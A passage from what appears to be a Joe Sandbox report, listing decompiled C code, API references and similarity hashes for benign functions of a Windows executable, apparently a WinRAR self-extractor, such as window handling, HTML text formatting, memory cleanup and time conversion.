								SetWindowTextW(_t68, _t67);
								return L00B83E2E(_t67);
							}
						}
					}
				}
				return _t44;
			}

0x00b79ede
0x00b79ee2
0x00b79ee8
0x00b79eeb
0x00b79eee
0x00b79efa
0x00b79f03
0x00b79f08
0x00b79f0d
0x00b79f13
0x00b79f19
0x00b79f1d
0x00b79f15
0x00b79f15
0x00b79f15
0x00b79f28
0x00b79f2b
0x00b79f31
0x00b79f35
0x00b79f2d
0x00b79f2d
0x00b79f2d
0x00b79f3b
0x00b79f44
0x00b79f5b
0x00b79f65
0x00b79f6a
0x00b79f6a
0x00b79f70
0x00b79f7e
0x00b79fab
0x00b79fb1
0x00b79fb8
0x00b79ff2
0x00b79ff4
0x00b79ff9
0x00000000
0x00b7a002
0x00b79fba
0x00b79fbc
0x00b79fc3
0x00b79fc6
0x00b79fcd
0x00b79fd2
0x00b79fd6
0x00b79fdb
0x00b79fe3
0x00000000
0x00b79fef
0x00b79fd6
0x00b79fc6
0x00b79fbc
0x00b7a00e

APIs

ShowWindow.USER32(?,00000000), ref: 00B79EEE
GetWindowRect.USER32(?,00000000), ref: 00B79F44
ShowWindow.USER32(?,00000005,00000000), ref: 00B79FDB
SetWindowTextW.USER32(?,00000000), ref: 00B79FE3
ShowWindow.USER32(00000000,00000005), ref: 00B79FF9

Strings

RarHtmlClassName, xrefs: 00B79FA5

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: f824bfa00486b5f4afd339e469038c0adb573c7f52c4c4d802f056176f43561d
Instruction ID: 90e9e4c9b2425ec49c95beb513880bd98e283314168dbc76e3248b669de07287
Opcode Fuzzy Hash: f824bfa00486b5f4afd339e469038c0adb573c7f52c4c4d802f056176f43561d
Instruction Fuzzy Hash: 1F41A231004210AFDB21AF64DC48F6B7BE8FF48B01F04C599F859AA166DB34E944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B79955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00B79955(void* __edx, void* __eflags) {
				void* __ecx;
				signed int _t25;
				void* _t29;
				signed int _t30;
				intOrPtr _t31;
				void* _t35;
				signed int _t38;
				signed int _t45;
				void* _t51;
				signed short* _t52;
				void* _t53;
				signed short* _t55;
				signed short* _t57;
				signed short* _t58;
				void* _t59;
				void* _t60;

				_t57 =  *(_t59 + 0x10);
				_push(0x200 + E00B83E13(_t57) * 0xc);
				_t52 = E00B83E33(0x200 + E00B83E13(_t57) * 0xc);
				 *(_t59 + 0x10) = _t52;
				if(_t52 != 0) {
					E00B86066(_t52, L"<style>body{font-family:\"Arial\";font-size:12;}</style>");
					_t38 = E00B83E13(_t52);
					_t60 = _t59 + 0xc;
					_t25 =  *_t57 & 0x0000ffff;
					_t55 = _t57;
					if(_t25 == 0) {
						L19:
						_t52[_t38] = 0;
						L00B83E2E(_t57);
						return _t52;
					}
					_t45 = _t25;
					 *((intOrPtr*)(_t60 + 0x18)) = 0x20;
					_t29 = 0xd;
					_t51 = 0xa;
					do {
						if(_t45 != _t29 || _t55[1] != _t51 || _t55[2] != _t29 || _t55[3] != _t51) {
							if(_t55 <= _t57) {
								L17:
								_t52[_t38] = _t45;
								_t38 = _t38 + 1;
								goto L18;
							}
							_t31 =  *((intOrPtr*)(_t60 + 0x14));
							if(_t45 != _t31 ||  *((intOrPtr*)(_t55 - 2)) != _t31) {
								goto L17;
							} else {
								E00B86066( &(_t52[_t38]), L"&nbsp;");
								_t38 = _t38 + 6;
								goto L16;
							}
						} else {
							_t58 =  &(_t52[_t38]);
							_t53 = 0xa;
							while(_t55[3] == _t53) {
								E00B86066(_t58, L"<br>");
								_t55 =  &(_t55[2]);
								_t38 = _t38 + 4;
								_t35 = 0xd;
								_t58 =  &(_t58[4]);
								if(_t55[2] == _t35) {
									continue;
								}
								break;
							}
							_t52 =  *(_t60 + 0x10);
							_t55 =  &(_t55[1]);
							_t57 =  *(_t60 + 0x1c);
							L16:
							_t51 = 0xa;
						}
						L18:
						_t55 =  &(_t55[1]);
						_t30 =  *_t55 & 0x0000ffff;
						_t45 = _t30;
						_t29 = 0xd;
					} while (_t30 != 0);
					goto L19;
				}
				return _t57;
			}

0x00b79958
0x00b7996c
0x00b79972
0x00b79974
0x00b7997c
0x00b7998d
0x00b79998
0x00b7999a
0x00b7999d
0x00b799a1
0x00b799a6
0x00b79a4f
0x00b79a52
0x00b79a56
0x00000000
0x00b79a5f
0x00b799ae
0x00b799b0
0x00b799b8
0x00b799bb
0x00b799bc
0x00b799bf
0x00b79a0d
0x00b79a36
0x00b79a36
0x00b79a3a
0x00000000
0x00b79a3a
0x00b79a0f
0x00b79a16
0x00000000
0x00b79a1e
0x00b79a27
0x00b79a2e
0x00000000
0x00b79a2e
0x00b799d3
0x00b799d5
0x00b799d8
0x00b799d9
0x00b799e5
0x00b799ec
0x00b799ef
0x00b799f4
0x00b799f5
0x00b799fc
0x00000000
0x00000000
0x00000000
0x00b799fc
0x00b799fe
0x00b79a02
0x00b79a05
0x00b79a31
0x00b79a33
0x00b79a33
0x00b79a3b
0x00b79a3b
0x00b79a40
0x00b79a43
0x00b79a48
0x00b79a48
0x00000000
0x00b799bc
0x00000000

APIs

_wcslen.LIBCMT ref: 00B7995E
_wcslen.LIBCMT ref: 00B79993

Strings

 , xrefs: 00B79A21
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00B79987
<br>, xrefs: 00B799DF
, xrefs: 00B799B0

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: db98f624d413802fe3969ca64b754ebeae42d90bc6cc006812fa3ec288d8637e
Instruction ID: bcec358bea459a0159760f3227b9c6e14c121d90276cceb3f8273a3c27abeab5
Opcode Fuzzy Hash: db98f624d413802fe3969ca64b754ebeae42d90bc6cc006812fa3ec288d8637e
Instruction Fuzzy Hash: 95318F3264434566EA30BB549C42F7B73E4EB90720F50C4AFF5AA572D0FB60AD41C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C8A4 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B8C8A4(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00B8C868(_t45, 7);
					E00B8C868(_t45 + 0x1c, 7);
					E00B8C868(_t45 + 0x38, 0xc);
					E00B8C868(_t45 + 0x68, 0xc);
					E00B8C868(_t45 + 0x98, 2);
					E00B88DCC( *((intOrPtr*)(_t45 + 0xa0)));
					E00B88DCC( *((intOrPtr*)(_t45 + 0xa4)));
					E00B88DCC( *((intOrPtr*)(_t45 + 0xa8)));
					E00B8C868(_t45 + 0xb4, 7);
					E00B8C868(_t45 + 0xd0, 7);
					E00B8C868(_t45 + 0xec, 0xc);
					E00B8C868(_t45 + 0x11c, 0xc);
					E00B8C868(_t45 + 0x14c, 2);
					E00B88DCC( *((intOrPtr*)(_t45 + 0x154)));
					E00B88DCC( *((intOrPtr*)(_t45 + 0x158)));
					E00B88DCC( *((intOrPtr*)(_t45 + 0x15c)));
					return E00B88DCC( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00b8c8aa
0x00b8c8af
0x00b8c8b8
0x00b8c8c3
0x00b8c8ce
0x00b8c8d9
0x00b8c8e7
0x00b8c8f2
0x00b8c8fd
0x00b8c908
0x00b8c916
0x00b8c924
0x00b8c935
0x00b8c943
0x00b8c951
0x00b8c95c
0x00b8c967
0x00b8c972
0x00000000
0x00b8c982
0x00b8c987

APIs

Part of subcall function 00B8C868: _free.LIBCMT ref: 00B8C891

_free.LIBCMT ref: 00B8C8F2

Part of subcall function 00B88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8C896,?,00000000,?,00000000,?,00B8C8BD,?,00000007,?,?,00B8CCBA,?), ref: 00B88DE2
Part of subcall function 00B88DCC: GetLastError.KERNEL32(?,?,00B8C896,?,00000000,?,00000000,?,00B8C8BD,?,00000007,?,?,00B8CCBA,?,?), ref: 00B88DF4

_free.LIBCMT ref: 00B8C8FD
_free.LIBCMT ref: 00B8C908
_free.LIBCMT ref: 00B8C95C
_free.LIBCMT ref: 00B8C967
_free.LIBCMT ref: 00B8C972
_free.LIBCMT ref: 00B8C97D

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 7a9421d567c22c169bb236959bf4aeb6b8f039916a962587afb7bf36e660487b
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: C2111FB1580B04AAE521B7B1CC0BFDB7FED9F04B00F804C69B29D665B2EA75B505C760

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00B7E5EE() {
				intOrPtr _t3;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t15;

				_t3 =  *0xbc1cd8;
				if(_t3 == 1) {
					L11:
					return 0;
				}
				if(_t3 != 0) {
					return 1;
				}
				_t15 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t15 != 0) {
					_t7 = GetProcAddress(_t15, "AcquireSRWLockExclusive");
					if(_t7 == 0) {
						goto L3;
					}
					 *0xbc1cdc = _t7;
					_t10 = GetProcAddress(_t15, "ReleaseSRWLockExclusive");
					if(_t10 == 0) {
						goto L3;
					}
					 *0xbc1ce0 = _t10;
					L7:
					asm("lock cmpxchg [edx], ecx");
					if(0 != 0 || _t15 != 1) {
						return 0xbadbad;
					} else {
						goto L11;
					}
				}
				L3:
				_t15 = 1;
				goto L7;
			}

0x00b7e5ee
0x00b7e5fa
0x00b7e65f
0x00000000
0x00b7e65f
0x00b7e5fe
0x00000000
0x00b7e65b
0x00b7e60b
0x00b7e60f
0x00b7e61b
0x00b7e623
0x00000000
0x00000000
0x00b7e62b
0x00b7e630
0x00b7e638
0x00000000
0x00000000
0x00b7e63a
0x00b7e63f
0x00b7e648
0x00b7e64e
0x00000000
0x00000000
0x00000000
0x00000000
0x00b7e64e
0x00b7e611
0x00b7e611
0x00000000

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00B7E669,00B7E5CC,00B7E86D), ref: 00B7E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B7E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B7E630

Strings

KERNEL32.DLL, xrefs: 00B7E600
AcquireSRWLockExclusive, xrefs: 00B7E615
ReleaseSRWLockExclusive, xrefs: 00B7E625

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 6ebd79614a31445eba67dbc4c74a02c22dc44b576cd4aa389bd36832464a264f
Instruction ID: d05b85c747754bada1121016d3fac4e4aa55d69d8bdb18e6b86c42b337ba62e3
Opcode Fuzzy Hash: 6ebd79614a31445eba67dbc4c74a02c22dc44b576cd4aa389bd36832464a264f
Instruction Fuzzy Hash: 70F0C2717802225B4F225F695DD4B6732C8EE3E74131188F9F939E7112EF20CC605B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B7146A Relevance: 9.1, APIs: 6, Instructions: 98
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00B7146A(signed int* __ecx, void* __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				signed int _t56;
				signed int _t70;
				signed int _t72;
				signed int _t77;
				signed int _t85;
				intOrPtr* _t89;
				signed int _t90;
				signed int _t92;
				signed int* _t93;

				_t89 = _a4;
				_t93 = __ecx;
				_v48.wYear =  *_t89;
				_v48.wMonth =  *((intOrPtr*)(_t89 + 4));
				_v48.wDay =  *((intOrPtr*)(_t89 + 8));
				_v48.wHour =  *((intOrPtr*)(_t89 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t89 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t89 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					_t90 = 0;
					_t77 = 0;
				} else {
					if(E00B6B146() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t70 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, esi");
						asm("adc eax, esi");
						_t85 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, esi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t70 = _v72.dwHighDateTime.dwLowDateTime;
						_t85 = _v72.dwLowDateTime;
					}
					_t92 = 0x64;
					_t72 = _t85;
					_t77 = _t70 * _t92 + (_t72 * _t92 >> 0x20);
					_t90 = _t72 * _t92;
				}
				 *_t93 = _t90;
				_a4 = _t77;
				_t56 =  *((intOrPtr*)(_t89 + 0x18)) + _t90;
				asm("adc ecx, ebx");
				 *_t93 = _t56;
				_a4 = 0;
				return _t56;
			}

0x00b71471
0x00b71475
0x00b7147a
0x00b71483
0x00b7148c
0x00b71495
0x00b7149e
0x00b714a7
0x00b714ae
0x00b714b3
0x00b714ca
0x00b7156c
0x00b7156e
0x00b714d0
0x00b714da
0x00b71500
0x00b71513
0x00b71523
0x00b71533
0x00b7153f
0x00b71545
0x00b7154d
0x00b71553
0x00b71555
0x00b71559
0x00b714dc
0x00b714e6
0x00b714ec
0x00b714f0
0x00b714f0
0x00b7155d
0x00b71562
0x00b71566
0x00b71568
0x00b71568
0x00b71570
0x00b71575
0x00b7157b
0x00b7157e
0x00b71580
0x00b71584
0x00b7158c

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00B714C2

Part of subcall function 00B6B146: GetVersionExW.KERNEL32(?), ref: 00B6B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B714E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B71500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B71513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B71523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B71533

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 4e4a798cb6ee4a9e01f38ea06ed8ef7139032307098784170e2265dc3ceaf674
Instruction ID: 7ed21f0196d982711d3ce05fa5068c41bba371dcf78dc2e0cb4f0e38d217d42a
Opcode Fuzzy Hash: 4e4a798cb6ee4a9e01f38ea06ed8ef7139032307098784170e2265dc3ceaf674
Instruction Fuzzy Hash: 5331F879118315ABC704DFA8C98599BB7F8FF98714F004A1EF999D3220E730D649CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00B82AFA Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00B82AFA(void* __ecx, void* __edx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t24;
				long _t25;
				void* _t28;

				_t13 = __ecx;
				if( *0xb9e7d0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00B83CCD(_t13, __eflags,  *0xb9e7d0);
					_t14 = _t24;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00B83D08(_t14, __eflags,  *0xb9e7d0, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t28 = E00B88DC1(_t16);
								_t18 = 1;
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00B83D08(_t18, __eflags,  *0xb9e7d0, 0);
								} else {
									_t8 = E00B83D08(_t18, __eflags,  *0xb9e7d0, _t28);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L00B83E2E(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x00b82afa
0x00b82b01
0x00b82b14
0x00b82b1b
0x00b82b1d
0x00b82b1e
0x00b82b21
0x00b82b3a
0x00b82b3a
0x00b82b23
0x00b82b23
0x00b82b25
0x00b82b2f
0x00b82b35
0x00b82b36
0x00b82b38
0x00b82b3f
0x00b82b48
0x00b82b4b
0x00b82b4c
0x00b82b4e
0x00b82b62
0x00b82b62
0x00b82b6b
0x00b82b50
0x00b82b57
0x00b82b5d
0x00b82b5e
0x00b82b60
0x00b82b74
0x00b82b76
0x00b82b76
0x00000000
0x00000000
0x00000000
0x00b82b60
0x00b82b79
0x00000000
0x00000000
0x00000000
0x00b82b38
0x00b82b25
0x00b82b81
0x00b82b8b
0x00b82b03
0x00b82b05
0x00b82b05

APIs

GetLastError.KERNEL32(?,?,00B82AF1,00B802FC,00B7FA34), ref: 00B82B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B82B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B82B2F
SetLastError.KERNEL32(00000000,00B82AF1,00B802FC,00B7FA34), ref: 00B82B81

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a12841258cead0cee5e4cb6a95e92a018131d90e5ab67e6882d7a6f903f0068f
Instruction ID: 8100b58cf5a6275c871fc6e1d3f49139d4681aa2b91e7671abbe14c67884ec81
Opcode Fuzzy Hash: a12841258cead0cee5e4cb6a95e92a018131d90e5ab67e6882d7a6f903f0068f
Instruction Fuzzy Hash: 8501D43210B312AEE6243BB4BD99A262BD9EB01FB476007BBF120560F0EF118C40D354

Uniqueness

Uniqueness Score: -1.00%

Function 00B897E5 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00B897E5(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t10;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_push(_t30);
				_t36 = GetLastError();
				_t2 =  *0xb9e7fc; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00B8B136(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00B8AEB1(_t20, _t25, _t31, __eflags,  *0xb9e7fc, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00B89649(_t25, _t31, 0xbc2288);
							E00B88DCC(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00B88DCC();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00B88D24(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xb9e7fc; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t10 = E00B8B136(_t25, 1, 0x364); // executed
							_t32 = _t10;
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00B8AEB1(_t21, _t27, _t32, __eflags,  *0xb9e7fc, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00B89649(_t27, _t32, 0xbc2288);
									E00B88DCC(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00B88DCC();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00B8AE5B(0, _t25, _t31, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00B8AE5B(__ebx, _t23, _t30, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00b897e5
0x00b897e5
0x00b897e5
0x00b897e8
0x00b897ef
0x00b897f1
0x00b897f6
0x00b897f9
0x00b89807
0x00b8980e
0x00b89813
0x00b89816
0x00b89819
0x00b8982b
0x00b89830
0x00b89832
0x00b8983d
0x00b89844
0x00b89849
0x00b8984c
0x00b8984e
0x00000000
0x00000000
0x00000000
0x00000000
0x00b89834
0x00b89834
0x00000000
0x00b89834
0x00b8981b
0x00b8981b
0x00b8981c
0x00b8981c
0x00b89821
0x00b8985c
0x00b8985d
0x00b89863
0x00b89868
0x00b8986b
0x00b8986c
0x00b8986d
0x00b89874
0x00b89876
0x00b89878
0x00b8987d
0x00b89880
0x00b8988e
0x00b89895
0x00b8989a
0x00b8989d
0x00b898a0
0x00b898b2
0x00b898b7
0x00b898b9
0x00b898c4
0x00b898ca
0x00b898d2
0x00b898d4
0x00000000
0x00000000
0x00000000
0x00000000
0x00b898bb
0x00b898bb
0x00000000
0x00b898bb
0x00b898a2
0x00b898a2
0x00b898a3
0x00b898a3
0x00b898d6
0x00b898d7
0x00b898d7
0x00b89882
0x00b89888
0x00b8988c
0x00b898df
0x00b898e0
0x00b898e6
0x00000000
0x00000000
0x00000000
0x00b8988c
0x00b898ed
0x00b898ed
0x00b897fb
0x00b89801
0x00b89805
0x00b89850
0x00b89851
0x00b8985b
0x00000000
0x00000000
0x00000000
0x00b89805

APIs

GetLastError.KERNEL32(?,00BA1098,00B84674,00BA1098,?,?,00B840EF,?,?,00BA1098), ref: 00B897E9
_free.LIBCMT ref: 00B8981C
_free.LIBCMT ref: 00B89844
SetLastError.KERNEL32(00000000,?,00BA1098), ref: 00B89851
SetLastError.KERNEL32(00000000,?,00BA1098), ref: 00B8985D
_abort.LIBCMT ref: 00B89863

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 83d7f1385ca1d0bcd0f333ae6ac3c06b206baa2e3caac80f7d40acbcaa59593b
Instruction ID: 1322626453fe08b7fe7bd3c404801ebbd37244672e5eb6250c2d81dddf72c973
Opcode Fuzzy Hash: 83d7f1385ca1d0bcd0f333ae6ac3c06b206baa2e3caac80f7d40acbcaa59593b
Instruction Fuzzy Hash: 2FF0A43614060367DA1237746D5AB3B1AE5CFD2BA1F3801B9F524A72B2FE24C802C765

Uniqueness

Uniqueness Score: -1.00%

Function 00B7DC3B Relevance: 9.0, APIs: 6, Instructions: 42
